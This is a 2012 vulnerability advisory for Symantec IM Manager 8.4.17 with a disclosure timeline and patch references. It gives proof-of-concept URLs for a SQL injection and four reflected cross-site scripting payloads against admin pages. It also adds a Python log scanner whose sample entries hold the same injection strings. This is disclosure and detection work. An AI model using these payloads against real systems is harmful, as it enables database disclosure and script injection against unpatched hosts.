Sunday, April 29, 2012

Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities

Description
Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.


Proof of concept
SQL Injection
==========

http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--



Cross-Site Scripting (XSS)
====================

  • http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
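
For reviewing web server logs on hosts that ran an affected version, the following added example (not part of the original advisory or of Symantec's code) flags requests to the scripts listed above whose parameters do not have a plain integer or single-word shape. The expected parameter shapes, the IIS W3C log field layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters taken from the advisory's proof-of-concept URLs.
# Expected shapes are assumptions: "int" = signed integer, "token" = single word.
WATCHED = {
    "imadminpolicyenfqry.asp": {"policyenftype": "int"},
    "imadminsystemdashboard.asp": {"refreshratesetting": "token"},
    "imadmintoc_simple.asp": {"nav": "token", "menuitem": "token"},
    "imadminedituser.asp": {"action": "token"},
}
SHAPES = {"int": re.compile(r"-?\d+\Z"), "token": re.compile(r"[A-Za-z0-9_]*\Z")}

def suspicious_params(request_uri):
    """Return (script, param, decoded value) for watched params of unexpected shape."""
    parts = urlsplit(request_uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    rules = WATCHED.get(script, {})
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        kind = rules.get(name.lower())
        if kind and not SHAPES[kind].match(value):
            hits.append((script, name, value))
    return hits

def scan_w3c_log(lines):
    """Scan IIS W3C extended log lines; return (line number, client IP, hits)."""
    fields, results = [], []
    for number, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared per log file
        elif fields and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            uri = row.get("cs-uri-stem", "") + "?" + row.get("cs-uri-query", "")
            hits = suspicious_params(uri)
            if hits:
                results.append((number, row.get("c-ip", "-"), hits))
    return results

# Constructed sample log (documentation IP addresses, invented timestamps).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-01-01 10:00:01 192.0.2.10 GET /IMManager/admin/IMAdminTOC_simple.asp nav=reports&menuitem=newReports 200
2012-01-01 10:00:07 192.0.2.77 GET /IMManager/admin/IMAdminPolicyEnfQry.asp PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,null-- 200
2012-01-01 10:00:09 192.0.2.77 GET /IMManager/admin/IMAdminEdituser.asp action='%22--%3E%3Cscript%3Ealert(1)%3C/script%3E 200
""".splitlines()

if __name__ == "__main__":
    for number, client, hits in scan_w3c_log(SAMPLE_LOG):
        print(number, client, hits)
```

A hit only shows that a request of this shape was received; whether it succeeded depends on the patch level of the host at the time.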



Solution
Symantec has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/

Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - Patch released.
2011-09-30 - Advisory published by Secunia.
